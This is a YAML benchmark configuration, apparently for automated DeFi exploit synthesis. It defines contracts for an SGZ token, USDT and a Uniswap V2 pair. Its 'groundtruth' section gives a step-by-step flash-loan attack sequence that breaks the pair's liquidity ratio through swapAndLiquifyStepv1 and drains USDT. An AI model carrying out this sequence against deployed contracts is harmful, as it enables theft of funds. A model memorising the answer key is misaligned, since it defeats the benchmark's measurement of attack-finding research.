# Information for benchmarks building.
project_name: "SGZ"

ctrt_name2cls:
  - ["usdt", "USDT"]
  - ["sgz", "SGZ"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["usdt", ""]
  - ["sgz", "new SGZ(address(usdt))"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function breaklr_pair_sgz() internal {
        sgz.swapAndLiquifyStepv1();
    }"

extra_deployments:
  - "sgz.afterDeploy(address(router), address(pair));"
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "100e18"]
  - ["swap", "pair", "usdt", "sgz", "usdt.balanceOf(attacker)"]
  - ["breaklr", "pair", "sgz"]
  - ["swap", "pair", "sgz", "usdt", "sgz.balanceOf(attacker)"]
  - ["payback", "usdt", "100e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "sgz":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_defientry: true
    hacked_oracles: ["pair"]
  "pair":
    is_swappair: true
    uniswap_order: ["sgz", "usdt"]
    support_swaps:
      "usdt": ["sgz", "usdt"]
      "sgz": ["sgz", "usdt"]
    is_oracle: true
    oracle: "pair"

pattern: "Liquidity Ratio Break"
